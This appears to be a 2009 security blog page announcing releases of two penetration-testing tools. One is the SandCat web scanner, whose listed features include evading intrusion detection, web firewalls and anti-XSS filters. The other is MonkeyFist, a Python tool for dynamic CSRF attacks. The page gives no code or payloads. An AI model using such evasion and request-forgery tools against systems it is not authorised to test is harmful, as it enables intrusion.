Tuesday, August 18, 2009

SandCat v3.8 Released

Sandcat allows web administrators to perform aggressive and comprehensive scans of an organization’s web server to isolate vulnerabilities and identify security holes. The Sandcat scanner requires basic inputs such as host names, start URLs and port numbers to scan a complete web site and test all the web applications for security vulnerabilities

New features in version 3.8
Improved JavaScript/AJAX Support - Sandcat’s JavaScript emulator makes Sandcat behave as both Firefox and IE, simulating user interaction (such as key press and mouse click), AJAX calls and more. This feature complements the JavaScript analysis feature available since Sandcat 3.0

Multi-Layer Defense Evasion - Sandcat 3.8 attempts to detect and evate intrusion detection systems, web application firewalls, web honeypots and anti-XSS filters.

Multi-Thread Sessions (Pro version only) - Sandcat Session Launcher adds concurrent sessions support in Sandcat. Multiple host threads per session are also supported.

And more - A new, improved HTML parser, improved link detection, faster and more robust report generation, and many other enhancements greatly expand the Sandcat’s capabilities and make your life as a penetration tester a lot easier.

Download Free Release

Monday, August 10, 2009

MonkeyFist v0.4 Released

Hexagon Security Group releases MonkeyFist, a dynamic Request Forgery attack tool. (http://hexsec.com/)


MonkeyFist is a tool that creates dynamic request forgeries based on cross-domain data leakage. The tool then constructs a payload based on data in the payloads.xml file and sends it to the user's browser. This may include session data bypassing protection mechanisms for Cross-Site Request Forgery.

Written in

It is written in Python which means it is cross platform. Many operating systems already come with Python installed. The only dependency as of now is that lxml be installed. Currently this is just being used for the fixation payload type.

Read the Dynamic CSRF paper here


More Information

For usage or practical examples, check out the Neohaxor blog.

Best Regards.


The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.